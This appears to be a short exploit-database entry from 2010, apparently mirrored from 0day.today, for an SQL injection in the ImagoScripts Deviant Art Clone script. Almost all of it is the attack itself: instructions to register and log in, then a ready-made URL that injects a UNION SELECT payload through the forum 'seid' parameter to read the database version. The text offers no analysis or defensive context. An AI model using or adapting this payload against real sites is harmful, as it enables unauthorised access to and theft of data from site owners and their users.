id: 10604
date: 01/04/2010
title: ImagoScripts Deviant Art Clone SQL Injection Vulnerability
author: alnjm33
cves: 

==========================================================
ImagoScripts Deviant Art Clone SQL Injection Vulnerability
==========================================================

Exploit Title:ImagoScripts Deviant Art Clone SQL Injection Vulnerability
Date: 4/1/2010
Author: alnjm33
Software Link: http://imagoscripts.com/index.php?act=viewProd&productId=2 it cost 50$ :)
________________________
first join in site
site/path/index.php?mode=join
then log in
and this is exploit
site/path//index.php?mode=forums&act=viewcat&seid=-1/**/union/**/select 1,version(),3,4--



#  0day.today [2023-03-27]  #